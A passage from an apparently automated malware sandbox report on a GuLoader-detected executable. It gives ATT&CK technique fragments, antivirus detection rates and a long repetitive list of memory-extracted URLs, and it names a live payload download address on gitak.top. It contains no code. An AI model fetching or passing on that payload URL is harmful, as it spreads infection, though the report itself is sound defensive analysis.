      Security Account Manager3
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS13
      System Information Discovery
      Distributed Component Object ModelInput Capture14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Source | Detection | Scanner | Label | Link
      WEAREX_IHRACAT.exe | 58% | ReversingLabs | Win32.Trojan.Guloader |
      WEAREX_IHRACAT.exe | 70% | Virustotal | | Browse
      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exe | 58% | ReversingLabs | Win32.Trojan.Guloader |
      C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll | 0% | ReversingLabs | |
      No Antivirus matches
      Source | Detection | Scanner | Label | Link
      gitak.top | 23% | Virustotal | | Browse
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      gitak.top | 172.67.207.219 | true | false | | unknown
      Name | Malicious | Antivirus Detection | Reputation
      https://gitak.top/dmAaHCQMI79.bin | true | 20%, Virustotal, Browse; Avira URL Cloud: malware | unknown
WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.binM~WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.bin/WEAREX_IHRACAT.exe, 00000002.00000002.6653610966.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://gitak.top/dmAaHCQMI79.binDWEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.binNJWEAREX_IHRACAT.exe, 00000002.00000002.6653324742.0000000002838000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.bine~WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725765947.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723257171.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, 
WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDWEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binWEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.binY~WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://www.gopher.ftp://ftp.WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://gitak.top/W~WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723257171.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.bin/o~WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binRWEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.bin/Y~WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725765947.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.binRWEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828251598.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdWEAREX_IHRACAT.exe, 00000002.00000001.1798696574.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://gitak.top/dmAaHCQMI79.binXWEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.bin/K~vWEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/e~WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.binKWEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.bin-~WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725765947.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, 
WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binXWEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.bino~WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://gitak.top/dmAaHCQMI79.binA~WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.binK~vWEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653610966.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binDWEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/dmAaHCQMI79.binfWEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      unknown
      https://ocsp.quovadisoffshore.com0WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 